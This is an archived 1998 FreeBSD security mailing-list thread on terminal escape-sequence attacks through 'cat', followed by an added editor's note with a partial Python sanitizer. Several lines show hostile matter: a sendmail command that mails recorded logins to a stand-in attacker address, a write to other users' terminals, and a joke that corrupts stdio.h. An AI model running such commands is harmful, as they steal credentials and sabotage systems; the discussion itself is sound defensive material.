the program ask the terminal to send the answers back to it for
processing. It was also used to allow us to read back the contents of the
screen so we could send it to lpr to do a screen print.

It also opened up the possibility of abuse by embedding the escape
sequences in text files as you found. We also sometimes cat'ed the escape
sequences to other people's terminals by using a command like 'cat abc.txt
>/dev/tty1a' to send commands to other people's terminals. Mostly it was
harmless fun like sending hundreds of bell characters but some people
actually sent commands to delete files or do other nasty things.
Harold Hankins
--

From owner-freebsd-security Thu Sep 10 13:08:16 1998
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA13150 for freebsd-security-outgoing; Thu, 10 Sep 1998 13:08:16 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from dfw.nationwide.net (dfw.nationwide.net [198.175.15.10]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA13137 for ; Thu, 10 Sep 1998 13:08:06 -0700 (PDT) (envelope-from aleph1@dfw.net)
Received: from localhost (aleph1@localhost) by dfw.nationwide.net (8.9.0/8.9.0) with SMTP id PAA17800; Thu, 10 Sep 1998 15:01:33 -0500 (CDT)
Date: Thu, 10 Sep 1998 15:01:32 -0500 (CDT)
From: Aleph One
X-Sender: aleph1@dfw.nationwide.net
To: "Jordan K. Hubbard"
cc: Michael Richards <026809r@dragon.acadiau.ca>, security@FreeBSD.ORG
Subject: Re: cat exploit
In-Reply-To: <17574.905449550@time.cdrom.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 10 Sep 1998, Jordan K. Hubbard wrote:

> The problem is that Jay's message didn't actually have a point. :)
>
> Rather, it described a symptom common to most VT100 compliant terminal
> emulators and something very clearly under the "well don't DO that then"
> category. It's nothing new at all and if you're not sure of the
> contents of a file, don't just blindly cat it to your screen. The
> same goes for any binary I might hand you - if I put up a file on
> an FTP site called ``megaspacewar.exe'' and you go and run it on your
> Windows box and it trojans you to death (or worse), whose fault is
> that? :-) Same basic issue.

Whoa! If you don't know the contents of a file don't read it. If you don't
read a file you don't know its contents. That's some really useful
suggestion. How about something more practical? Like being able to turn
off this "feature".
> - Jordan

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01

From owner-freebsd-security Thu Sep 10 14:03:23 1998
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA25764 for freebsd-security-outgoing; Thu, 10 Sep 1998 14:03:23 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from gate.az.com ([206.63.203.18]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA25724 for ; Thu, 10 Sep 1998 14:03:10 -0700 (PDT) (envelope-from yankee@gate.az.com)
Received: (from yankee@localhost) by gate.az.com (8.8.5/8.8.5) id OAA25189; Thu, 10 Sep 1998 14:02:54 -0700 (PDT)
Date: Thu, 10 Sep 1998 14:02:54 -0700 (PDT)
From: "Dan Seafeldt, AZ.COM System Administrator"
To: freebsd-security@FreeBSD.ORG
Subject: Re: Err.. cat exploit.. (!)
In-Reply-To: <199809101622.MAA09014@khavrinen.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

A similar but different technique was used at a wa university computer
center here in the 80's - A 'bomb' or sequence of escape codes embedded in
a routine-sounding email message to the root console or staff console
which caused the terminals in the staff/admin offices to record certain
keypresses as a macro string (specifically entry of login/password) then
at the right time enter/playback something like this while sitting at a
prompt:

echo '...recorded keypresses...' > tmpfile
sendmail hack@hackville.com < tmpfile

From owner-freebsd-security Thu Sep 10 14:04:55 1998
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA25968 for freebsd-security-outgoing; Thu, 10 Sep 1998 14:04:55 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from aniwa.sky (pppk-10.igrin.co.nz [202.49.245.89]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA25953 for ; Thu, 10 Sep 1998 14:04:51 -0700 (PDT) (envelope-from andrew@squiz.co.nz)
Received: from localhost (andrew@localhost) by aniwa.sky (8.8.7/8.8.7) with SMTP id JAA05560; Fri, 11 Sep 1998 09:01:04 +1200 (NZST) (envelope-from andrew@squiz.co.nz)
Date: Fri, 11 Sep 1998 09:01:04 +1200 (NZST)
From: Andrew McNaughton
X-Sender: andrew@aniwa.sky
Reply-To: andrew@squiz.co.nz
To: Karl Denninger
cc: Garrett Wollman, Josef Karthauser, Jay Tribick, freebsd-security@FreeBSD.ORG
Subject: Re: Err.. cat exploit.. (!)
In-Reply-To: <19980910133615.A13227@Mcs.Net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 10 Sep 1998, Karl Denninger wrote:

> On Thu, Sep 10, 1998 at 12:22:09PM -0400, Garrett Wollman wrote:
> Actually, for VTxxx series terminals (and good emulators of them) as well as
> most others, the problem is far worse.
>
> Most terminals can be made to display something, set the cursor to where the
> "something" is, and then *send the line containing the something to the
> host*.
>
> This allows ARBITRARY commands to be accidentally (read: maliciously)
> executed by someone doing nothing more than displaying a file!
>
> This is an OLD trick, but one which still works, and if the person doing the
> tricking is crafty it can be particularly dangerous. (Consider that most
> terminals also have attributes such as "invisible" text available, and/or
> that you can send the line, then back up again and overwrite it).
>
> I can craft a 40-50 byte sequence that will, if the file is "catted" as
> root, give me an instant SUID root shell somewhere on the system that
> you're very unlikely to find.

Ouch. I'm surprised this doesn't come up more often. This means that the
safety of using xterm is dependent on every program you might use
protecting you against escape sequences, which is never going to be the
case.

Are there any safe shell-in-a-window alternatives to xterm then? Someone
mentioned a possible setting in xterm?
Andrew

From owner-freebsd-security Thu Sep 10 14:06:38 1998
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA26242 for freebsd-security-outgoing; Thu, 10 Sep 1998 14:06:38 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from time.cdrom.com (time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA26229 for ; Thu, 10 Sep 1998 14:06:34 -0700 (PDT) (envelope-from jkh@time.cdrom.com)
Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.8/8.8.8) with ESMTP id OAA18175; Thu, 10 Sep 1998 14:03:44 -0700 (PDT) (envelope-from jkh@time.cdrom.com)
To: Aleph One
cc: Michael Richards <026809r@dragon.acadiau.ca>, security@FreeBSD.ORG
Subject: Re: cat exploit
In-reply-to: Your message of "Thu, 10 Sep 1998 15:01:32 CDT."
Date: Thu, 10 Sep 1998 14:03:44 -0700
Message-ID: <18171.905461424@time.cdrom.com>
From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Whoa! If you dont know the contents of a file dont read it. If you dont > read a file you dont know its contents. Thats some really useful > suggestion. Only because you didn't actually read my message, you just fired off a knee-jerk response. Again, what I actually said was "don't blindly cat it to your screen" which is a perfectly valid point. If you want something which protects you, use more or less as many others have suggested. If you don't want something which protects you then why are we even having this discussion? Those who deliberately wish to inflict pain on themselves can find it in a wide variety of areas. - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 14:07:31 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA26447 for freebsd-security-outgoing; Thu, 10 Sep 1998 14:07:31 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from hillbilly.hayseed.net (hillbilly.hayseed.net [204.62.130.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA26423; Thu, 10 Sep 1998 14:07:26 -0700 (PDT) (envelope-from enkhyl@hayseed.net) Received: from hillbilly.hayseed.net (enkhyl@hillbilly.hayseed.net [204.62.130.2]) by hillbilly.hayseed.net (8.9.1/8.8.5) with SMTP id OAA17408; Thu, 10 Sep 1998 14:10:04 -0700 Date: Thu, 10 Sep 1998 14:10:03 -0700 (PDT) 
From: Enkhyl To: "David O'Brien" cc: security@FreeBSD.ORG, current@FreeBSD.ORG Subject: Re: FreeBSD Hardening In-Reply-To: <19980909195235.A4400@nuxi.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 9 Sep 1998, David O'Brien wrote: > > evaluate security-related fixes for inclusion in FreeBSD. Is there anyone > > see http://www.freebsd.org/auditors.html > and http://www.watson.org/fbsd-hardening/index.html I've looked at both. I think this project would be a subset of what the code auditors are doing, and it seems it would augment their work. Thanks for the references. -- Christopher Nielsen Scient: The Art and Science of Electronic Business cnielsen@scient.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 14:23:00 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA29708 for freebsd-security-outgoing; Thu, 10 Sep 1998 14:23:00 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from aniwa.sky (pppk-10.igrin.co.nz [202.49.245.89]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA29700 for ; Thu, 10 Sep 1998 14:22:56 -0700 (PDT) (envelope-from andrew@squiz.co.nz) Received: from localhost (andrew@localhost) by aniwa.sky (8.8.7/8.8.7) with SMTP id JAA05654; Fri, 11 Sep 1998 09:19:42 +1200 (NZST) (envelope-from andrew@squiz.co.nz) Date: Fri, 11 Sep 1998 09:19:42 +1200 (NZST) 
From: Andrew McNaughton
X-Sender: andrew@aniwa.sky
Reply-To: andrew@squiz.co.nz
To: Studded
cc: Michael Richards <026809r@dragon.acadiau.ca>, security@FreeBSD.ORG
Subject: terminal escape exploit (was Re: cat exploit)
In-Reply-To: <35F818CA.8647A116@dal.net>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 10 Sep 1998, Studded wrote:

> It seems to me that a lot of people missed the point of one of the
> warnings that someone else posted in response actually. Don't use cat
> routinely to view files. Use more, or better yet less since less doesn't
> view binary files by default.

It's not just cat that you've got to worry about. tail is another one. How many people routinely use 'tail -f' to monitor log info that includes potentially tainted content?

The problem is not cat. It's xterm and other similar terminal programs.

Andrew

From owner-freebsd-security Thu Sep 10 14:28:55 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA00786 for freebsd-security-outgoing; Thu, 10 Sep 1998 14:28:55 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from dfw.nationwide.net (dfw.nationwide.net [198.175.15.10]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA00771 for ; Thu, 10 Sep 1998 14:28:42 -0700 (PDT) (envelope-from aleph1@dfw.net)
Received: from localhost (aleph1@localhost) by dfw.nationwide.net (8.9.0/8.9.0) with SMTP id QAA13246; Thu, 10 Sep 1998 16:22:31 -0500 (CDT)
Date: Thu, 10 Sep 1998 16:22:30 -0500 (CDT)
From: Aleph One
X-Sender: aleph1@dfw.nationwide.net
To: Jared Mauch
cc: "Jordan K. Hubbard" , Michael Richards <026809r@dragon.acadiau.ca>, security@FreeBSD.ORG
Subject: Re: cat exploit
In-Reply-To: <19980910171918.E12040@puck.nether.net>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 10 Sep 1998, Jared Mauch wrote:

> > Whoa! If you don't know the contents of a file don't read it. If you don't
> > read a file you don't know its contents. That's some really useful
> > suggestion.
>
> Silly rabbit, tricks are for kids.
>
> What you really need to do is use a modern file(1), or
> more specifically file with a modern magic(5) file, to determine
> the best way to view it.

Are you going to really use file(1) on every README file you find to try to determine if it's dangerous? Will all your users do the same? What we need to fix is silly programs like xterm that process dangerous escape characters.
> - jared > > -- > Jared Mauch | pgp key available via finger from jared@puck.nether.net > | http://puck.nether.net/~jared/ > Aleph One / aleph1@dfw.net http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 14:30:44 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA01141 for freebsd-security-outgoing; Thu, 10 Sep 1998 14:30:44 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from indigo.ie (ts02-010.dublin.indigo.ie [194.125.134.140]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA01107 for ; Thu, 10 Sep 1998 14:30:25 -0700 (PDT) (envelope-from rotel@indigo.ie) Received: (from nsmart@localhost) by indigo.ie (8.8.8/8.8.7) id WAA01790; Thu, 10 Sep 1998 22:21:04 +0100 (IST) (envelope-from rotel@indigo.ie) 
From: Niall Smart
Message-Id: <199809102121.WAA01790@indigo.ie>
Date: Thu, 10 Sep 1998 22:21:04 +0000
In-Reply-To: <35F818CA.8647A116@dal.net>; Studded
Reply-To: rotel@indigo.ie
X-Files: The truth is out there
X-Mailer: Mail User's Shell (7.2.6 beta(3) 11/17/96)
To: Studded , Michael Richards <026809r@dragon.acadiau.ca>
Subject: Re: cat exploit
Cc: security@FreeBSD.ORG
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sep 10, 11:22am, Studded wrote:
} Subject: Re: cat exploit
> Michael Richards wrote:
> >
> > Hi.
> >
> > Is it just me or did everyone miss the point of Jay's message?
>
> It seems to me that a lot of people missed the point of one of the
> warnings that someone else posted in response actually. Don't use cat
> routinely to view files. Use more, or better yet less since less doesn't
> view binary files by default.

The "well don't do that then" response is not the correct solution to this problem. The issue is that the terminal emulator doesn't have an option to disable the features which are dangerous (which should be disabled by default). This is a subtle attack which can be prevented in this way with far greater effectiveness than relying on the administrator/user to understand and remember the potential for exploitation present in seemingly innocuous actions.

Perhaps someone will now be prompted to make the necessary changes. :)

Niall
--
Niall Smart, rotel@indigo.ie.
Amaze your friends and annoy your enemies: echo '#define if(x) if (!(x))' >> /usr/include/stdio.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 14:30:49 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA01172 for freebsd-security-outgoing; Thu, 10 Sep 1998 14:30:49 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from dfw.nationwide.net (dfw.nationwide.net [198.175.15.10]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA01130 for ; Thu, 10 Sep 1998 14:30:36 -0700 (PDT) (envelope-from aleph1@dfw.net) Received: from localhost (aleph1@localhost) by dfw.nationwide.net (8.9.0/8.9.0) with SMTP id QAA13854; Thu, 10 Sep 1998 16:24:28 -0500 (CDT) Date: Thu, 10 Sep 1998 16:24:28 -0500 (CDT) 
From: Aleph One
X-Sender: aleph1@dfw.nationwide.net
To: "Jordan K. Hubbard"
cc: Michael Richards <026809r@dragon.acadiau.ca>, security@FreeBSD.ORG
Subject: Re: cat exploit
In-Reply-To: <18171.905461424@time.cdrom.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 10 Sep 1998, Jordan K. Hubbard wrote:

> Only because you didn't actually read my message, you just fired off a
> knee-jerk response. Again, what I actually said was "don't blindly
> cat it to your screen" which is a perfectly valid point. If you want
> something which protects you, use more or less as many others have
> suggested. If you don't want something which protects you then why
> are we even having this discussion? Those who deliberately wish to
> inflict pain on themselves can find it in a wide variety of areas.

Because it's non-intuitive. How many end users are going to know that simply cat'ing a file is dangerous? More or less shouldn't protect me. xterm and rxvt should.

> - Jordan
>

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01

From owner-freebsd-security Thu Sep 10 14:34:20 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA02167 for freebsd-security-outgoing; Thu, 10 Sep 1998 14:34:20 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from indigo.ie (ts02-010.dublin.indigo.ie [194.125.134.140]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA02103 for ; Thu, 10 Sep 1998 14:34:10 -0700 (PDT) (envelope-from rotel@indigo.ie)
Received: (from nsmart@localhost) by indigo.ie (8.8.8/8.8.7) id WAA01807; Thu, 10 Sep 1998 22:24:53 +0100 (IST) (envelope-from rotel@indigo.ie)
From: Niall Smart
Message-Id: <199809102124.WAA01807@indigo.ie>
Date: Thu, 10 Sep 1998 22:24:53 +0000
In-Reply-To: <17574.905449550@time.cdrom.com>; "Jordan K. Hubbard"
Reply-To: rotel@indigo.ie
X-Files: The truth is out there
X-Mailer: Mail User's Shell (7.2.6 beta(3) 11/17/96)
To: "Jordan K. Hubbard" , 026809r@dragon.acadiau.ca (Michael Richards)
Subject: Re: cat exploit
Cc: security@FreeBSD.ORG
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Sep 10, 10:45am, "Jordan K. Hubbard" wrote:
} Subject: Re: cat exploit
> > Is it just me or did everyone miss the point of Jay's message?
>
> Rather, it described a symptom common to most VT100 compliant terminal
> emulators and something very clearly under the "well don't DO that then"
> category. It's nothing new at all and if you're not sure of the
> contents of a file, don't just blindly cat it to your screen.

It might not be new, but it's certainly subtle and not well known. Let's imagine there were a buffer overflow in some editor which could be exploited by opening a file with a certain header and contents. If someone claimed this were dangerous, would "well don't edit arbitrary files, look at them in less first" be an appropriate response?

Niall
--
Niall Smart, rotel@indigo.ie.
Amaze your friends and annoy your enemies: echo '#define if(x) if (!(x))' >> /usr/include/stdio.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 14:44:36 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA04253 for freebsd-security-outgoing; Thu, 10 Sep 1998 14:44:36 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from puck.nether.net (puck.nether.net [204.42.254.5]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA04238 for ; Thu, 10 Sep 1998 14:44:30 -0700 (PDT) (envelope-from jared@puck.nether.net) Received: (from jared@localhost) by puck.nether.net (8.9.0/8.7.3) id RAA12480; Thu, 10 Sep 1998 17:19:19 -0400 Message-ID: <19980910171918.E12040@puck.nether.net> Date: Thu, 10 Sep 1998 17:19:18 -0400 
From: Jared Mauch
To: Aleph One , "Jordan K. Hubbard"
Cc: Michael Richards <026809r@dragon.acadiau.ca>, security@FreeBSD.ORG
Subject: Re: cat exploit
References: <17574.905449550@time.cdrom.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.93.2i
In-Reply-To: ; from Aleph One on Thu, Sep 10, 1998 at 03:01:32PM -0500
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, Sep 10, 1998 at 03:01:32PM -0500, Aleph One wrote:
> On Thu, 10 Sep 1998, Jordan K. Hubbard wrote:
>
> > The problem is that Jay's message didn't actually have a point. :)
> >
> > Rather, it described a symptom common to most VT100 compliant terminal
> > emulators and something very clearly under the "well don't DO that then"
> > category. It's nothing new at all and if you're not sure of the
> > contents of a file, don't just blindly cat it to your screen. The
> > same goes for any binary I might hand you - if I put up a file on
> > an FTP site called ``megaspacewar.exe'' and you go and run it on your
> > Windows box and it trojans you to death (or worse), whose fault is
> > that? :-) Same basic issue.
>
> Whoa! If you don't know the contents of a file don't read it. If you don't
> read a file you don't know its contents. That's some really useful
> suggestion.

Silly rabbit, tricks are for kids.

What you really need to do is use a modern file(1), or more specifically file with a modern magic(5) file, to determine the best way to view it.

About downloading something then executing it, that's a whole other can of worms, because in downloading it, you put it on your computer specifically, and if you run it not knowing what it is, you're asking for trouble (IMHO). If it's something from out of a box, talk to people about fixing the license under which software is distributed. See http://cnn.com/TECH/computing/9809/09/lawmakers.idg/ for a related story.

Using more/less/view/vi/emacs/pico/od to view the file would be a much better choice than cat, or at least use cat -v | more. If you want a machine that makes it tougher to view a binary file, go buy a Mac.

- jared

--
Jared Mauch | pgp key available via finger from jared@puck.nether.net
| http://puck.nether.net/~jared/

From owner-freebsd-security Thu Sep 10 14:49:30 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA05232 for freebsd-security-outgoing; Thu, 10 Sep 1998 14:49:30 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from stage1.thirdage.com (stage1.ThirdAge.com [204.74.82.151]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA05219 for ; Thu, 10 Sep 1998 14:49:28 -0700 (PDT) (envelope-from jal@ThirdAge.com)
Received: from gigi (gigi.ThirdAge.com [204.74.82.169]) by stage1.thirdage.com (8.8.5/8.8.5) with SMTP id OAA17647; Thu, 10 Sep 1998 14:44:22 -0700 (PDT)
Message-Id: <3.0.5.32.19980910144756.01d24c70@204.74.82.151>
X-Sender: jal@204.74.82.151
X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32)
Date: Thu, 10 Sep 1998 14:47:56 -0700
To: Aleph One
From: Jamie Lawrence
Subject: Re: cat exploit
Cc: security@FreeBSD.ORG
In-Reply-To:
References: <17574.905449550@time.cdrom.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

At 03:01 PM 9/10/98 -0500, Aleph One wrote:

>> Rather, it described a symptom common to most VT100 compliant terminal
>> emulators and something very clearly under the "well don't DO that then"
>> category. It's nothing new at all and if you're not sure of the
>> contents of a file, don't just blindly cat it to your screen. The
>> same goes for any binary I might hand you - if I put up a file on
>> an FTP site called ``megaspacewar.exe'' and you go and run it on your
>> Windows box and it trojans you to death (or worse), whose fault is
>> that? :-) Same basic issue.
>
>Whoa! If you don't know the contents of a file don't read it. If you don't
>read a file you don't know its contents. That's some really useful
>suggestion.

Aleph, you should know better. This 'problem' has been around for ages. Doing things that have been known to be dangerous for years as root is not something any Unix that I know of tries to protect against.

>How about something more practical? Like being able to turn off this
>"feature".

"rm /bin/cat"

Or, not cat'ing unknown files as root. Or as your own username, depending on your threat model. Or use a utility that strips control sequences.
>> - Jordan > >Aleph One / aleph1@dfw.net -j To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 14:59:28 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA07873 for freebsd-security-outgoing; Thu, 10 Sep 1998 14:59:28 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from time.cdrom.com (time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA07866 for ; Thu, 10 Sep 1998 14:59:27 -0700 (PDT) (envelope-from jkh@time.cdrom.com) Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.8/8.8.8) with ESMTP id OAA18340; Thu, 10 Sep 1998 14:56:40 -0700 (PDT) (envelope-from jkh@time.cdrom.com) To: Aleph One cc: Michael Richards <026809r@dragon.acadiau.ca>, security@FreeBSD.ORG Subject: Re: cat exploit In-reply-to: Your message of "Thu, 10 Sep 1998 16:24:28 CDT." Date: Thu, 10 Sep 1998 14:56:40 -0700 Message-ID: <18336.905464600@time.cdrom.com> 
From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Because its non-intuitive. How many end users are going to know that > simply cat'ing a file is dangerous? More or less shouldnt protect me. > xterm and rxvt should. Fine, submit your patches to the XFree86 Project and the author of rxvt then. This discussion passed "tedious" in the road some time back and is now heading rapidly towards idiotic status. - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Sep 10 14:59:34 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA07908 for freebsd-security-outgoing; Thu, 10 Sep 1998 14:59:34 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from puck.nether.net (puck.nether.net [204.42.254.5]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA07897 for ; Thu, 10 Sep 1998 14:59:32 -0700 (PDT) (envelope-from jared@puck.nether.net) Received: (from jared@localhost) by puck.nether.net (8.9.0/8.7.3) id RAA12666; Thu, 10 Sep 1998 17:34:19 -0400 Message-ID: <19980910173419.G12040@puck.nether.net> Date: Thu, 10 Sep 1998 17:34:19 -0400 
From: Jared Mauch
To: Aleph One
Cc: "Jordan K. Hubbard" , Michael Richards <026809r@dragon.acadiau.ca>, security@FreeBSD.ORG
Subject: Re: cat exploit
References: <19980910171918.E12040@puck.nether.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.93.2i
In-Reply-To: ; from Aleph One on Thu, Sep 10, 1998 at 04:22:30PM -0500
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, Sep 10, 1998 at 04:22:30PM -0500, Aleph One wrote:
> On Thu, 10 Sep 1998, Jared Mauch wrote:
>
> > > Whoa! If you don't know the contents of a file don't read it. If you don't
> > > read a file you don't know its contents. That's some really useful
> > > suggestion.
> >
> > Silly rabbit, tricks are for kids.
> >
> > What you really need to do is use a modern file(1), or
> > more specifically file with a modern magic(5) file, to determine
> > the best way to view it.
>
> Are you going to really use file(1) on every README file you find to try
> to determine if it's dangerous? Will all your users do the same? What we
> need to fix is silly programs like xterm that process dangerous escape
> characters.

How are you going to do your terminal emulation then? If you always use cat -v, that will escape them. What's the problem?

    echo "alias cat='cat -v'" >> ~/.profile
    echo 'alias cat cat -v' >> ~/.cshrc

etc..
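[Editor's note, not part of Jared's message.] The thread keeps returning to two points: Jordan's and Jared's "don't cat unknown files, or at least pipe them through cat -v", and Andrew's observation that tail -f on a log containing attacker-supplied text is exposed in exactly the same way. A shell alias only covers an interactive cat; it does nothing for tail -f, for cat run from a script, or for any other program that writes untrusted bytes at the terminal. The filter below is an added example written for this page, not code from the thread, from FreeBSD or from xterm: it reproduces the rendering cat -v performs (C0 controls as ^X, DEL as ^?, bytes with the high bit set prefixed with M-), so an ESC byte can never reach the emulator's parser; it also reports the offsets at which ESC or the single-byte 8-bit CSI (0x9b) occurred, and it processes input line by line so it can sit at the end of a pipeline such as tail -f /var/log/messages | python3 safecat.py. The script name and the sample log line are made up for the example.

```python
"""safecat.py: make untrusted text safe to send to a terminal, the way cat -v does.

Added example for this page (not code from the mailing-list thread, FreeBSD or
xterm). cat -v renders every non-printing byte visibly: C0 controls become ^X,
DEL becomes ^?, and bytes with the high bit set are prefixed with M-. Because
ESC (0x1b) becomes the two printable characters "^[", no escape sequence hidden
in a file or a log line can reach the terminal emulator's parser.
"""
import sys

# Bytes cat -v passes through untouched (besides printable ASCII): TAB and LF.
# CR is deliberately not in this set, so it shows up as ^M, as cat -v prints it.
PASSTHROUGH = {0x09, 0x0A}

ESC = 0x1B       # 7-bit escape: starts every ESC-based control sequence
CSI_8BIT = 0x9B  # single-byte C1 form of "ESC [" accepted by many VT emulators


def visible_byte(b: int) -> str:
    """Render one byte in cat -v notation."""
    if b in PASSTHROUGH or 0x20 <= b < 0x7F:
        return chr(b)
    prefix = ""
    if b & 0x80:            # 8-bit byte: mark it M- and look at the low 7 bits
        prefix = "M-"
        b &= 0x7F
    if b == 0x7F:           # DEL (or 0xff after stripping the high bit)
        return prefix + "^?"
    if b < 0x20:            # C0 control (or C1 control after stripping the high bit)
        return prefix + "^" + chr(b + 0x40)
    return prefix + chr(b)  # M- followed by an ordinary printable character


def sanitize_for_terminal(data: bytes) -> str:
    """Return data with every control byte rendered visibly (cat -v style)."""
    return "".join(visible_byte(b) for b in data)


def find_escapes(data: bytes) -> list:
    """Offsets of bytes that would start a terminal control sequence (ESC or 8-bit CSI)."""
    return [i for i, b in enumerate(data) if b in (ESC, CSI_8BIT)]


# Constructed sample (not a real log): a login record whose user-name field
# carries a clear-screen sequence followed by a bare ESC.
SAMPLE_LOG = (
    b"Sep 10 14:06:38 host login[1234]: failed login for "
    b"\x1b[2J\x1bbob from 192.0.2.7\n"
)

if __name__ == "__main__":
    if sys.stdin.isatty():
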